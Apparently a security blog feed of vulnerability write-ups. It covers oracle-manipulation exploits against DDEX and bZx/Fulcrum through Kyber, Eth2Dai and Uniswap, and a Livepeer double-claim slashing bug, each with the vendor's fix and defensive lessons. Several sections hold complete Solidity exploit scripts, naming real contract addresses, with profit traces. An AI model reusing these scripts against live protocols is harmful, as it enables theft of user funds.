            .withBalance(INITIAL_BALANCE)
            .first(this.checkRates)
            .then(this.skewRates)
            .then(this.checkRates)
            .then(this.steal)
            .then(this.cleanup)
            .then(this.checkProfits);
    }
    
    function checkRates() external {
        uint ethPrice = ETH_ORACLE.getPrice(HYDRO_ETH);
        uint daiPrice = DAI_ORACLE.getPrice(DAI);
        
        printf("eth=%.18u dai=%.18u\n", abi.encode(ethPrice, daiPrice));
    }
    
    uint private boughtFromMatchingMarket = 0;
    
    function skewRates() external {
        skewUniswapPrice();
        skewMatchingMarket();
        require(DAI_ORACLE.updatePrice());
    }
    
    function skewUniswapPrice() internal {
        DAI.getFromUniswap(DAI.balanceOf(address(DAI.getUniswapExchange())) * 75 / 100);
    }
    
    function skewMatchingMarket() internal {
        uint start = DAI.balanceOf(address(this));
        WETH.deposit.value(address(this).balance)();
        WETH.approve(address(MATCHING_MARKET), uint(-1));
        while (DAI_ORACLE.getEth2DaiPrice() != 0) {
            MATCHING_MARKET.buyAllAmount(DAI, 5000 ether, WETH, uint(-1));
        }
        boughtFromMatchingMarket = DAI.balanceOf(address(this)) - start;
        WETH.withdrawAll();
    }
    
    function steal() external {
        HydroLike.Market memory ethDaiMarket = HYDRO.getMarket(ETHDAI_MARKET_ID);
        HydroLike.BalancePath memory commonPath = HydroLike.BalancePath({
            category: HydroLike.BalanceCategory.Common,
            marketID: 0,
            user: address(this)
        });
        HydroLike.BalancePath memory ethDaiPath = HydroLike.BalancePath({
            category: HydroLike.BalanceCategory.CollateralAccount,
            marketID: 1,
            user: address(this)
        });
        
        uint ethWanted = HYDRO.getPoolCashableAmount(HYDRO_ETH);
        uint daiRequired = ETH_ORACLE.getPrice(HYDRO_ETH) * ethWanted * ethDaiMarket.withdrawRate / DAI_ORACLE.getPrice(DAI) / 1 ether + 1 ether;
        
        printf("ethWanted=%.18u daiNeeded=%.18u\n", abi.encode(ethWanted, daiRequired));
        
        HydroLike.Action[] memory actions = new HydroLike.Action[](5);
        actions[0] = HydroLike.Action({
            actionType: HydroLike.ActionType.Deposit,
            encodedParams: abi.encode(address(DAI), uint(daiRequired))
        });
        actions[1] = HydroLike.Action({
            actionType: HydroLike.ActionType.Transfer,
            encodedParams: abi.encode(address(DAI), commonPath, ethDaiPath, uint(daiRequired))
        });
        actions[2] = HydroLike.Action({
            actionType: HydroLike.ActionType.Borrow,
            encodedParams: abi.encode(uint16(ETHDAI_MARKET_ID), address(HYDRO_ETH), uint(ethWanted))
        });
        actions[3] = HydroLike.Action({
            actionType: HydroLike.ActionType.Transfer,
            encodedParams: abi.encode(address(HYDRO_ETH), ethDaiPath, commonPath, uint(ethWanted))
        });
        actions[4] = HydroLike.Action({
            actionType: HydroLike.ActionType.Withdraw,
            encodedParams: abi.encode(address(HYDRO_ETH), uint(ethWanted))
        });
        DAI.approve(address(HYDRO), daiRequired);
        HYDRO.batch(actions);
    }
    
    function cleanup() external {
        DAI.approve(address(MATCHING_MARKET), uint(-1));
        MATCHING_MARKET.sellAllAmount(DAI, boughtFromMatchingMarket, WETH, uint(0));
        WETH.withdrawAll();
        
        DAI.giveAllToUniswap();
        require(DAI_ORACLE.updatePrice());
    }
    
    function checkProfits() external {
        printf("profits=%.18u\n", abi.encode(address(this).balance - INITIAL_BALANCE));
    }
}

/*
### running script "ddex-exploit" at block 8572000
#### executing step: exploit
##### calling: checkRates()
eth=213.440000000000000000 dai=1.003140638067989051
##### calling: skewRates()
##### calling: checkRates()
eth=213.440000000000000000 dai=16.058419875880325580
##### calling: steal()
ethWanted=122.103009983203364425 daiNeeded=2435.392672403537525078
##### calling: cleanup()
##### calling: checkProfits()
profits=72.140629996890984407
#### finished executing step: exploit
*/
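As a sanity check, the daiNeeded figure in the trace is reproducible from the formula in steal() using the rates printed by checkRates(). The withdrawRate of 150% is an assumption here (the real value is read from HYDRO.getMarket() on-chain), but it makes the numbers line up:

```python
# Reproducing daiNeeded from the demo trace using the formula in steal():
#   daiRequired = ethPrice * ethWanted * withdrawRate / daiPrice + 1
# withdraw_rate = 1.50 is an assumption (the actual market parameter lives
# on-chain); all other inputs come straight from the printed trace.

eth_price     = 213.440000000000000000   # ETH/USD from checkRates()
dai_price     = 16.058419875880325580    # skewed DAI/USD after the attack
eth_wanted    = 122.103009983203364425   # all cashable ETH in the pool
withdraw_rate = 1.50                     # assumed collateral ratio (150%)

dai_required = eth_price * eth_wanted * withdraw_rate / dai_price + 1
# Matches daiNeeded=2435.392672... from the trace.
assert abs(dai_required - 2435.392672403537525078) < 0.01
```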

Solution

The DDEX team fixed this by deploying a new oracle which places sanity bounds on the price of DAI, currently set to 0.95 and 1.05.

function updatePrice()
	public
	returns (bool)
{
	uint256 _price = peek();

	if (_price == 0) {
		return false;
	}

	if (_price == price) {
		return true;
	}

	if (_price > maxPrice) {
		_price = maxPrice;
	} else if (_price < minPrice) {
		_price = minPrice;
	}

	price = _price;
	emit UpdatePrice(price);

	return true;
}
Source

bZx and Fulcrum

bZx is a decentralized margin-trading protocol, while Fulcrum is a project built by the bZx team on top of bZx itself. One feature of Fulcrum is the ability to take a loan on an iToken (read more about that here) using any* other token as collateral. In order to determine how much collateral is needed, bZx uses the Kyber Network as an on-chain decentralized oracle to check the conversion rate between the collateral token and the loan token.
* if it's tradable on Kyber

However, it's important to first understand how the Kyber Network functions. Unlike most other DEXes, the Kyber Network derives liquidity from reserves (read more about that here). When a user wants to make a trade between two tokens A and B, the main Kyber contract will query all registered reserves for the best rate between A/ETH and ETH/B, then perform the trade using the two reserves selected.

Reserves can be listed automatically through the PermissionlessOrderbookReserveLister contract, which will create a permissionless reserve. Reserves can also be listed by the Kyber team on behalf of a market maker after KYC and legal requirements are met. In this case, the reserve will be a permissioned reserve. When conducting a trade using Kyber, traders have the option of only using permissioned reserves, or using all available reserves.

The attack

When bZx checks the price of a collateral token, it specifies that only permissioned reserves should be used. This decision was made based on the Kyber whitepaper at the time, with the logic being that permissioned reserves had to undergo review and so the rates should be "correct".

Source, Credit: Kyber Network

This means that if we can somehow increase the rate reported by a permissioned reserve, we can trick Fulcrum into thinking our collateral is worth more than it really is.

A permissioned OrderbookReserve

On June 16 2019, the Kyber team listed an OrderbookReserve for the WAX token as a permissioned reserve in this transaction. This was interesting because the statement "an OrderbookReserve is always permissionless" was considered to be axiomatic.

After this reserve was listed, the Kyber Network itself continued to perform according to specifications. However, we can now significantly affect the apparent exchange rate between WAX and ETH simply by listing an order, which means that we can trick any project which relies on Kyber to provide an accurate FMV.
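A single thin reserve is so dangerous because Kyber quotes the best rate offered by any queried reserve. Before the attack, the WAX orderbook is empty and quotes a rate of 0; once the attacker lists one order offering 10 ETH for 1 WAX, that order becomes the best (and only) WAX→ETH rate. A conceptual sketch (not Kyber's actual matching logic):

```python
# Sketch of why one thin orderbook reserve skews Kyber's quoted rate.
# KyberNetwork returns the best rate offered across all queried reserves;
# an empty orderbook quotes 0, and a single 10-ETH-for-1-WAX bid becomes
# the best available rate. Conceptual model only.

def best_rate(reserves, src_amount):
    # rate = ETH received per token sold, best across all reserves
    quotes = [reserve(src_amount) for reserve in reserves]
    return max(quotes) if quotes else 0.0

def orderbook_reserve(bids):
    # bids: list of (eth_offered, tokens_wanted) limit orders
    def quote(src_amount):
        for eth_offered, tokens_wanted in bids:
            if tokens_wanted >= src_amount:
                return eth_offered / tokens_wanted   # ETH per token
        return 0.0                                   # no liquidity -> rate 0
    return quote

empty = orderbook_reserve([])
assert best_rate([empty], 1) == 0.0                  # pre-attack: 0 ETH/WAX

skewed = orderbook_reserve([(10.0, 1.0)])            # bid 10 ETH for 1 WAX
assert best_rate([skewed], 1) == 10.0                # quoted: 10 ETH/WAX
```

This mirrors the demo trace, where the quoted rate jumps from 0 to 10 after the malicious order is listed.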

Demo

The following script will turn a profit of approximately 1200ETH by:

  1. Listing an order buying 1 WAX for 10 ETH, increasing the price from 0.00ETH/WAX to 10ETH/WAX
  2. Borrowing DAI from bZx using WAX as a collateral
  3. Cancelling all orders and converting all assets to ETH
contract BZxWAXExploit is Script, Constants, TokenHelper, BZxHelpers {
    BZxLoanTokenV2Like private constant BZX_DAI = BZxLoanTokenV2Like(0x14094949152EDDBFcd073717200DA82fEd8dC960);
    
    ERC20Like private constant WAX = ERC20Like(0x39Bb259F66E1C59d5ABEF88375979b4D20D98022);
    OrderbookReserveLike private constant WAX_ORDER_BOOK = OrderbookReserveLike(0x75fF6BeC6Ed398FA80EA1596cef422D64681F057);
    
    uint constant private INITIAL_BALANCE = 150 ether;
    
    function setup() public {
        name("bzx-wax-exploit");
        blockNumber(8455720);
    }
    
    function run() public {
        begin("exploit")
            .withBalance(INITIAL_BALANCE)
            .first(this.checkRates)
            .then(this.makeOrder)
            .then(this.checkRates)
            .then(this.borrow)
            .then(this.cleanup)
            .finally(this.checkProfits);
    }
    
    uint constant rateCheckAmount = 1e8;
    
    function checkRates() external {
        (uint rate, uint slippage) = KYBER_NETWORK.getExpectedRate(WAX, KYBER_ETH, rateCheckAmount);
        printf("checking rates tokens=%.8u rate=%.18u slippage=%.18u\n", abi.encode(rateCheckAmount, rate, slippage));
    }
    
    uint constant waxBidAmount = 1e8;
    uint constant ethOfferAmount = 10 ether;
    uint32 private orderId;
    function makeOrder() external {
        orderId = WAX_ORDER_BOOK.ethToTokenList().nextFreeId();
        
        uint kncRequired = WAX_ORDER_BOOK.calcKncStake(ethOfferAmount);
        printf("making malicious order kncRequired=%.u\n", abi.encode(KNC.decimals(), kncRequired));
        
        KNC.getFromUniswap(kncRequired);
        WAX.getFromBancor(1 ether);
        
        WAX.approve(address(WAX_ORDER_BOOK), waxBidAmount);
        KNC.approve(address(WAX_ORDER_BOOK), kncRequired);
        
        WAX_ORDER_BOOK.depositEther.value(ethOfferAmount)(address(this));
        WAX_ORDER_BOOK.depositToken(address(this), waxBidAmount);
        WAX_ORDER_BOOK.depositKncForFee(address(this), kncRequired);
        require(WAX_ORDER_BOOK.submitEthToTokenOrder(uint128(ethOfferAmount), uint128(waxBidAmount)));
    }
    
    function borrow() external {
        bytes32 hash = doBorrow(BZX_DAI, false, BZX_DAI.marketLiquidity(), DAI, WAX);
        printf("borrowing loanHash=%32x\n", abi.encode(hash));
    }
    
    function cleanup() external {
        require(WAX_ORDER_BOOK.cancelEthToTokenOrder(orderId));
        WAX_ORDER_BOOK.withdrawEther(WAX_ORDER_BOOK.makerFunds(address(this), KYBER_ETH));
        WAX_ORDER_BOOK.withdrawToken(WAX_ORDER_BOOK.makerFunds(address(this), WAX));
        WAX_ORDER_BOOK.withdrawKncFee(WAX_ORDER_BOOK.makerKnc(address(this)));
        DAI.giveAllToUniswap();
        KNC.giveAllToUniswap();
        WAX.giveAllToBancor();
        WETH.withdrawAll();
    }
    
    function checkProfits() external {
        printf("profits=%.18u\n", abi.encode(address(this).balance - INITIAL_BALANCE));
    }
    
    function borrowInterest(uint amount) internal {
        DAI.getFromUniswap(amount);
    }
}

/*
### running script "bzx-wax-exploit" at block 8455720
#### executing step: exploit
##### calling: checkRates()
checking rates tokens=1.00000000 rate=0.000000000000000000 slippage=0.000000000000000000
##### calling: makeOrder()
making malicious order kncRequired=127.438017578344399080
##### calling: checkRates()
checking rates tokens=1.00000000 rate=10.000000000000000000 slippage=9.700000000000000000
##### calling: borrow()
collateral_required=232.02826470, interest_required=19750.481385867262370788
borrowing loanHash=0x2cca5c037a25b47338027b9d1bed55d6bc131b3d1096925538f611240d143c64
##### calling: cleanup()
##### calling: checkProfits()
profits=1170.851523093083307797
#### finished executing step: exploit
*/

Solution

The bZx team blocked this attack by whitelisting tokens which can be used as collateral.

Eth2Dai

Now that there's a whitelist on the tokens that can be used as collateral, we'll need to go through all the permissioned reserves to see if there's anything else that we can abuse. It turns out that DAI, one of the whitelisted tokens, has a permissioned reserve which integrates with Eth2Dai. As Eth2Dai allows users to create limit orders, this is essentially the previous attack but with more steps.

Interestingly, we first observe that although the Eth2Dai contract is titled MatchingMarket, it's not strictly true that all new orders will be automatically matched. This is because while the functions offer(uint,ERC20,uint,ERC20,uint) and offer(uint,ERC20,uint,ERC20,uint,bool) will trigger the matching logic, the function offer(uint,ERC20,uint,ERC20) does not.

// Make a new offer. Takes funds from the caller into market escrow.
function offer(
	uint pay_amt,    //maker (ask) sell how much
	ERC20 pay_gem,   //maker (ask) sell which token
	uint buy_amt,    //maker (ask) buy how much
	ERC20 buy_gem,   //maker (ask) buy which token
	uint pos         //position to insert offer, 0 should be used if unknown
)
	public
	can_offer
	returns (uint)
{
	return offer(pay_amt, pay_gem, buy_amt, buy_gem, pos, true);
}

function offer(
	uint pay_amt,    //maker (ask) sell how much
	ERC20 pay_gem,   //maker (ask) sell which token
	uint buy_amt,    //maker (ask) buy how much
	ERC20 buy_gem,   //maker (ask) buy which token
	uint pos,        //position to insert offer, 0 should be used if unknown
	bool rounding    //match "close enough" orders?
)
	public
	can_offer
	returns (uint)
{
	require(!locked, "Reentrancy attempt");
	require(_dust[pay_gem] <= pay_amt);

	if (matchingEnabled) {
	  return _matcho(pay_amt, pay_gem, buy_amt, buy_gem, pos, rounding);
	}
	return super.offer(pay_amt, pay_gem, buy_amt, buy_gem);
}
Source

Furthermore, we observe that even though the comments seem to suggest that only authorized users can call offer(uint,ERC20,uint,ERC20), there's no authorization logic at all.

// Make a new offer. Takes funds from the caller into market escrow.
//
// If matching is enabled:
//     * creates new offer without putting it in
//       the sorted list.
//     * available to authorized contracts only!
//     * keepers should call insert(id,pos)
//       to put offer in the sorted list.
//
// If matching is disabled:
//     * calls expiring market's offer().
//     * available to everyone without authorization.
//     * no sorting is done.
//
function offer(
	uint pay_amt,    //maker (ask) sell how much
	ERC20 pay_gem,   //maker (ask) sell which token
	uint buy_amt,    //taker (ask) buy how much
	ERC20 buy_gem    //taker (ask) buy which token
)
	public
	returns (uint)
{
	require(!locked, "Reentrancy attempt");
	var fn = matchingEnabled ? _offeru : super.offer;
	return fn(pay_amt, pay_gem, buy_amt, buy_gem);
}

While in practice the lack of authorization is irrelevant, as arbitrage bots will quickly fill any orders that can be profitably matched, within an atomic transaction we can create and cancel arbitrage-able orders before any bot has a chance to fill them.

All that's left is to slightly modify our script from the previous attack to place orders on Eth2Dai instead of the OrderbookReserve. Note that in this case we will need to call both offer(uint,ERC20,uint,ERC20), to submit the order to Eth2Dai without it being atomically matched, and then insert(uint,uint), to manually sort the order without triggering matching.

Demo

The following script will turn a profit of approximately 2500ETH by:

  1. Listing an order buying 1 DAI for 10 ETH, increasing the price from 0.006ETH/DAI to 9.98ETH/DAI.
  2. Borrowing ETH from bZx using DAI as collateral.
  3. Cancelling all orders and converting all assets to ETH.
contract BZxOasisExploit is Script, Constants, TokenHelper, BZxHelpers {
    BZxLoanTokenV2Like private constant BZX_ETH = BZxLoanTokenV2Like(0x77f973FCaF871459aa58cd81881Ce453759281bC);
    
    uint constant private INITIAL_BALANCE = 250 ether;
    
    function setup() public {
        name("bzx-oasis-exploit");
        blockNumber(8455720);
    }
    
    function run() public {
        begin("exploit")
            .withBalance(INITIAL_BALANCE)
            .first(this.checkRates)
            .then(this.makeOrder)
            .then(this.checkRates)
            .then(this.borrow)
            .then(this.cleanup)
            .finally(this.checkProfits);
    }
    
    uint constant rateCheckAmount = 1 ether;
    
    function checkRates() external {
        (uint rate, uint slippage) = KYBER_NETWORK.getExpectedRate(DAI, KYBER_ETH, rateCheckAmount);
        printf("checking rates tokens=%.18u rate=%.18u slippage=%.18u\n", abi.encode(rateCheckAmount, rate, slippage));
    }
    
    uint private id;
    
    uint constant daiBidAmount = 1 ether;
    uint constant ethOfferAmount = 10 ether;
    function makeOrder() external {
        WETH.deposit.value(ethOfferAmount)();
        WETH.approve(address(MATCHING_MARKET), ethOfferAmount);
        id = MATCHING_MARKET.offer(ethOfferAmount, WETH, daiBidAmount, DAI);
        printf("made order id=%u\n", abi.encode(id));
        
        require(MATCHING_MARKET.insert(id, 0));
    }
    
    function borrow() external {
        bytes32 hash = doBorrow(BZX_ETH, false, BZX_ETH.marketLiquidity(), WETH, DAI);
        printf("borrowing loanHash=%32x\n", abi.encode(hash));
    }
    
    function cleanup() external {
        require(MATCHING_MARKET.cancel(id));
        DAI.giveAllToUniswap();
        WETH.withdrawAll();
    }
    
    function checkProfits() external {
        printf("profits=%.18u\n", abi.encode(address(this).balance - INITIAL_BALANCE));
    }
    
    function borrowInterest(uint amount) internal {
        WETH.deposit.value(amount)();
    }
    
    function borrowCollateral(uint amount) internal {
        DAI.getFromUniswap(amount);
    }
}

/*
### running script "bzx-oasis-exploit" at block 8455720
#### executing step: exploit
##### calling: checkRates()
checking rates tokens=1.000000000000000000 rate=0.005950387240736517 slippage=0.005771875623514421
##### calling: makeOrder()
made order id=414191
##### calling: checkRates()
checking rates tokens=1.000000000000000000 rate=9.975000000000000000 slippage=9.675750000000000000
##### calling: borrow()
collateral_required=398.831304885561111810, interest_required=203.458599916962956188
borrowing loanHash=0x947839881794b73d61a0a27ecdbe8213f543bdd4f4a578eedb5e1be57221109c
##### calling: cleanup()
##### calling: checkProfits()
profits=2446.376892708285686012
#### finished executing step: exploit
*/

Solution

The bZx team blocked this attack by modifying the oracle logic such that if the collateral and loan token were both either DAI or WETH, then the exchange rate would be loaded directly from Maker's oracles.

However, this solution was incomplete because of the way Kyber resolves the best rate. If you'll recall, Kyber determines the best rate for A/B by determining the best rate for A/ETH and ETH/B, then calculating the amount of B that could be bought with the ETH received by trading A.

This meant that if we were to attempt to borrow a non-ETH token such as USDC using DAI as collateral, Kyber would first determine the best exchange rate for DAI/ETH, then the best rate for ETH/USDC, and finally the best rate for DAI/USDC. Because we can artificially increase the exchange rate for DAI/ETH, we can still manipulate the exchange rate for DAI/USDC even though we don't control a permissioned USDC reserve.
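The cross-rate composition can be sketched numerically. The rates below are hypothetical round numbers for illustration, not real Kyber reserve quotes:

```python
# Sketch of Kyber's cross-rate logic: the DAI/USDC rate is derived from
# DAI/ETH and ETH/USDC, so manipulating DAI/ETH alone skews DAI/USDC.
# All rates are hypothetical round numbers for illustration.

def cross_rate(rate_a_to_eth, rate_eth_to_b):
    # Amount of B bought with the ETH received from selling 1 A
    return rate_a_to_eth * rate_eth_to_b

rate_eth_to_usdc = 170.0          # honest reserve
honest_dai_to_eth = 1 / 170.0     # roughly fair market value
manipulated_dai_to_eth = 9.98     # our malicious Eth2Dai order

honest = cross_rate(honest_dai_to_eth, rate_eth_to_usdc)       # ~1 USDC per DAI
skewed = cross_rate(manipulated_dai_to_eth, rate_eth_to_usdc)  # ~1700 USDC per DAI

print(honest, skewed)
```

Because only the DAI/ETH hop needs to be manipulated, controlling a single permissioned reserve is enough to skew every DAI pair.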

The bZx team blocked this attack in two ways:

  1. If either the loan token or collateral token wasn't ETH, then bZx would manually determine the exchange rate between the token and ETH, unless
  2. the loan token or collateral token was a USD-based stablecoin, in which case bZx would use the rate from Maker's oracle

Uniswap

An astute reader may notice at this point that bZx's solution still does not handle incorrect FMVs for arbitrary tokens. This means that if we can find another permissioned reserve which can be manipulated, we can take out yet another undercollateralized loan.

After sifting through all the registered permissioned reserves for the whitelisted tokens, we notice that the REP token has a reserve which integrates with Uniswap. We already know from our attacks on DDEX that Uniswap's prices can be manipulated, so we can re-purpose our previous attack, swapping out Eth2Dai and DAI for Uniswap and REP.
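The price impact of buying most of a constant-product pool can be sketched as follows. The reserve sizes are hypothetical, and Uniswap V1's 0.3% fee is ignored:

```python
# Sketch of why buying 90% of a Uniswap pool's REP moves the spot price ~100x.
# Uniswap V1 holds reserves (eth, rep) with eth * rep = k (fee ignored).
eth_reserve, rep_reserve = 443.0, 8856.0   # hypothetical pool, ~0.05 ETH/REP

k = eth_reserve * rep_reserve
spot_before = eth_reserve / rep_reserve    # ETH per REP

rep_bought = rep_reserve * 0.90            # take 90% of the pool's REP
rep_after = rep_reserve - rep_bought
eth_after = k / rep_after                  # ETH paid in keeps k constant

spot_after = eth_after / rep_after
print(spot_before, spot_after, spot_after / spot_before)
```

Shrinking the REP side to a tenth inflates the ETH side tenfold, so the spot price moves by the square of the ratio, i.e. roughly 100x.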

Demo

The following script will turn a profit of approximately 2500ETH by:

  1. Performing a large buy of REP on Uniswap, increasing the price from 0.05ETH/REP to 6.05ETH/REP.
  2. Borrowing ETH from bZx using REP as collateral.
  3. Selling the REP back to Uniswap and converting all assets to ETH.
contract BZxUniswapExploit is Script, Constants, TokenHelper, BZxHelpers {
    BZxLoanTokenV3Like private constant BZX_ETH = BZxLoanTokenV3Like(0x77f973FCaF871459aa58cd81881Ce453759281bC);
    
    uint constant private INITIAL_BALANCE = 5000 ether;
    
    function setup() public {
        name("bzx-uniswap-exploit");
        blockNumber(8547500);
    }
    
    function run() public {
        begin("exploit")
            .withBalance(INITIAL_BALANCE)
            .first(this.checkRates)
            .then(this.makeOrder)
            .then(this.checkRates)
            .then(this.borrow)
            .then(this.cleanup)
            .finally(this.checkProfits);
    }
    
    uint constant rateCheckAmount = 10 ether;
    
    function checkRates() external {
        (uint rate, uint slippage) = KYBER_NETWORK.getExpectedRate(REP, KYBER_ETH, rateCheckAmount);
        printf("checking rates tokens=%.18u rate=%.18u slippage=%.18u\n", abi.encode(rateCheckAmount, rate, slippage));
    }
    
    function makeOrder() external {
        UniswapLike uniswap = REP.getUniswapExchange();
        uint totalSupply = REP.balanceOf(address(uniswap));
        uint borrowAmount = totalSupply * 90 / 100;
        REP.getFromUniswap(borrowAmount);
        printf("making order totalSupply=%.18u borrowed=%.18u\n", abi.encode(totalSupply, borrowAmount));
    }
    
    function borrow() external {
        bytes32 hash = doBorrow(BZX_ETH, true, BZX_ETH.marketLiquidity(), WETH, REP);
        printf("borrowing loanHash=%32x\n", abi.encode(hash));
    }
    
    function cleanup() external {
        REP.giveAllToUniswap();
        WETH.withdrawAll();
    }
    
    function checkProfits() external {
        printf("profits=%.18u\n", abi.encode(address(this).balance - INITIAL_BALANCE));
    }
    
    function borrowInterest(uint amount) internal {
        WETH.deposit.value(amount)();
    }
}

/*
### running script "bzx-uniswap-exploit" at block 8547500
#### executing step: exploit
##### calling: checkRates()
checking rates tokens=10.000000000000000000 rate=0.057621091203633720 slippage=0.055892458467524708
##### calling: makeOrder()
making order totalSupply=8856.102959786215028808 borrowed=7970.492663807593525927
##### calling: checkRates()
checking rates tokens=10.000000000000000000 rate=5.656379870360426078 slippage=5.486688474249613295
##### calling: borrow()
collateral_required=702.265284613341236862, interest_required=205.433213643594588344
borrowing loanHash=0x947839881794b73d61a0a27ecdbe8213f543bdd4f4a578eedb5e1be57221109c
##### calling: cleanup()
##### calling: checkProfits()
profits=2425.711777227580307468
#### finished executing step: exploit
*/

Solution

The bZx team reverted their fix for the previous attack and instead implemented a spread check, such that if the spread was above a certain threshold, the loan would be rejected. This solution handles the generic case so long as both tokens being queried have at least one non-manipulable reserve on Kyber, which is currently the case for all whitelisted tokens.

Key Takeaways

Don't use an on-chain decentralized oracle without some sort of validation

Due to the nature of on-chain decentralized oracles, ensure that you're validating the rate being returned, whether it's by taking the order (thereby nullifying any gains which may have been realized), comparing the rate against known good rates (in the case of DAI), or comparing the rate in both directions.
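As an illustration of the last option, a two-way check can be sketched like this (the threshold and rates are hypothetical, not bZx's actual logic):

```python
# Sketch of a two-way rate sanity check: rate(A->B) * rate(B->A) should be
# close to 1.0 on an honest market. A reserve that inflates only one
# direction makes the round-trip product blow up. Numbers are hypothetical.

def looks_sane(rate_ab, rate_ba, max_spread=0.10):
    product = rate_ab * rate_ba
    return abs(product - 1.0) <= max_spread

# Honest DAI/ETH market around 0.006 ETH per DAI
assert looks_sane(0.00595, 1 / 0.006)  # round-trip product ~0.99

# Manipulated: our order quotes 9.98 ETH per DAI, but the reverse
# direction still reflects the fair ~167 DAI per ETH
assert not looks_sane(9.98, 167.0)
```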

Consider the implications of dependencies on third-party projects

In both cases, DDEX and bZx assumed that Uniswap and Kyber would be sources of accurate price data. However, an accurate rate for a DEX means that a trade can be made at that rate, while an accurate rate for a DeFi project means that it is close to or equal to the FMV. In other words, an accurate rate for a DeFi project is an accurate rate for a DEX, but the opposite might not be true.

Furthermore, bZx's second attempt at solving this problem was insufficient due to a misunderstanding in how the Kyber Network internally calculates the exchange rate between two non-ETH tokens.

As such, before introducing a dependency on a third-party project, consider not only whether the project has been audited, but also whether the project's specifications and threat model align with your own. If you have the time, taking an in-depth look at their contracts also doesn't hurt.

Further Reading

]]>
The Livepeer slashing vulnerability
samczsun.com, Tue, 30 Jul 2019 02:44:29 GMT
https://samczsun.com/the-livepeer-slashing-vulnerability/

tl;dr

Improper input validation meant that the same claim could be submitted twice as proof of a transcoder double claiming a segment. This would have resulted in loss of funds as well as denial of service for the Livepeer network.

What is Livepeer?

Livepeer is a platform for streaming live video over the internet. One of the ways it facilitates this is by operating a marketplace where GPU time for transcoding videos can be bought and sold.

This marketplace roughly works as follows. Transcoders who want to sell their GPU time must stake Livepeer Tokens (LPT) and/or have others stake LPT for them. If they're among the top 25 transcoders by tokens staked, then they're eligible to receive work through the marketplace.

When a broadcaster wants to buy GPU time to transcode a video, they submit a job through the smart contract system. An active transcoder is randomly matched with this job, and the broadcaster can coordinate with the selected transcoder off-chain.

The broadcaster breaks down the video they want transcoded into small chunks, called segments. As the transcoder receives segments, they must record on-chain that they've begun work on those segments by submitting a claim. Each claim can only contain sequential segments, and certain segments are randomly subjected to further verification by the Livepeer network.

In order to ensure that malicious transcoders are held accountable, any third party can slash transcoders if certain conditions are met. If a transcoder is slashed, a portion of their staked tokens will be burnt, and they'll be removed from the list of active transcoders.

Currently, transcoders may be slashed if they meet one of these two conditions:

  1. The transcoder does not submit the necessary verification for a segment
  2. The transcoder submitted two claims for the same segment

The Vulnerability

Here's the code which determines whether a transcoder can be slashed for double claiming a segment.

function doubleClaimSegmentSlash(
    uint256 _jobId,
    uint256 _claimId1,
    uint256 _claimId2,
    uint256 _segmentNumber
) /* snip */ {
    Job storage job = jobs[_jobId];
    Claim storage claim1 = job.claims[_claimId1];
    Claim storage claim2 = job.claims[_claimId2];

    // Claim 1 must not be slashed
    require(claim1.status != ClaimStatus.Slashed);
    // Claim 2 must not be slashed
    require(claim2.status != ClaimStatus.Slashed);
    // Segment must be in claim 1 segment range
    require(_segmentNumber >= claim1.segmentRange[0] && _segmentNumber <= claim1.segmentRange[1]);
    // Segment must be in claim 2 segment range
    require(_segmentNumber >= claim2.segmentRange[0] && _segmentNumber <= claim2.segmentRange[1]);

    // Slash transcoder and provide finder params
    bondingManager().slashTranscoder(job.transcoderAddress, msg.sender, doubleClaimSegmentSlashAmount, finderFee);
     
    refundBroadcaster(_jobId);

    // Set claim 1 as slashed
    claim1.status = ClaimStatus.Slashed;
    // Set claim 2 as slashed
    claim2.status = ClaimStatus.Slashed;
}
Source

At first glance, this code looks perfectly fine. Both claims must be valid, and the supposedly double-claimed segment must be included in both claims. While it's unfortunate that the Checks-Effects-Interactions pattern isn't used, there's no risk of re-entrancy via the bondingManager.

However, the function does not check that the two specified claims are distinct. This means that any valid claim is eligible to be slashed simply by calling doubleClaimSegmentSlash with the same claim ID passed twice.
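
The flaw is easy to model outside the EVM. Here's a minimal sketch of the checks above, using a hypothetical claim store (not Livepeer's actual storage layout):

```python
# Sketch of doubleClaimSegmentSlash's checks: with _claimId1 == _claimId2,
# every require trivially passes for any legitimate claim.
claims = {7: {"status": "Pending", "range": (0, 10)}}  # hypothetical claim

def can_slash(claim_id1, claim_id2, segment):
    c1, c2 = claims[claim_id1], claims[claim_id2]
    # Neither claim may already be slashed
    if c1["status"] == "Slashed" or c2["status"] == "Slashed":
        return False
    # The segment must fall inside both claims' segment ranges
    return (c1["range"][0] <= segment <= c1["range"][1]
            and c2["range"][0] <= segment <= c2["range"][1])

# An honest, single claim of segments 0..10 is slashable against itself
assert can_slash(7, 7, segment=5)
```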

The Solution

Here's the one (two if you count comments) line solution, presented in all its glory.

// The provided claims must be different (i.e different IDs)
require(_claimId1 != _claimId2);
Source

The Impact

When a transcoder is slashed for double claiming, 3% of their staked LPT is deducted as penalty, with 5% of the penalty going to the finder and the remaining 95% burned. Furthermore, the transcoder is removed from the pool of active transcoders.

This means that for the top transcoder, who has staked ~1,100,000LPT, a mere 10 false slashes would bring their stake down to ~800,000LPT. Another 40 false slashes (for a total of 50) would result in a meager ~240,000LPT still staked.

Given that the attacker has the entire history of past claims to play with, and can also manipulate transcoders into doing legitimate work by submitting jobs, this scenario is not entirely unrealistic. Furthermore, through the finder's fee the attacker would have netted 5% of the penalized LPT, resulting in a cool ~43,000LPT (~1500ETH) for their troubles.
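
The arithmetic behind those figures can be checked directly, using the 3% penalty and 5% finder's fee described above; the starting stake is the ~1,100,000 LPT quoted, and exact results differ slightly from the rounded numbers in the text:

```python
# Sketch of the slashing economics: each false slash burns 3% of the
# remaining stake, and the finder keeps 5% of every penalty.
stake = 1_100_000.0
finder_reward = 0.0
for n in range(1, 51):
    penalty = stake * 0.03
    finder_reward += penalty * 0.05
    stake -= penalty
    if n == 10:
        stake_after_10 = stake

print(stake_after_10)   # ~811,000 LPT (the post rounds to ~800,000)
print(stake)            # ~240,000 LPT remaining after 50 slashes
print(finder_reward)    # ~43,000 LPT to the attacker
```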

Key Takeaways

Consider the assumptions made and ensure that they are true

When writing code, assumptions about what sorts of input will be received are made. As the developer works on the code and becomes more and more familiar with it, it's all too easy to fall into the trap of believing that these assumptions are etched into stone.

As such, when it comes time to write unit tests (or, even when just reviewing code), it's a good idea to list out the assumptions that were made and check whether they are really true, or just assumed to be true. In this case the assumption that both claim IDs would be distinct was made, but not enforced.

Have a response plan

Audited code does not equate to secure code, and as such response plans should always be developed in case a situation like this one arises. Due in part to having responded to security incidents before, the Livepeer team was able to quickly triage and resolve this problem. This was aided by their modular contract layout, which allowed them to pause and upgrade implementations as needed.

Further Reading

]]>
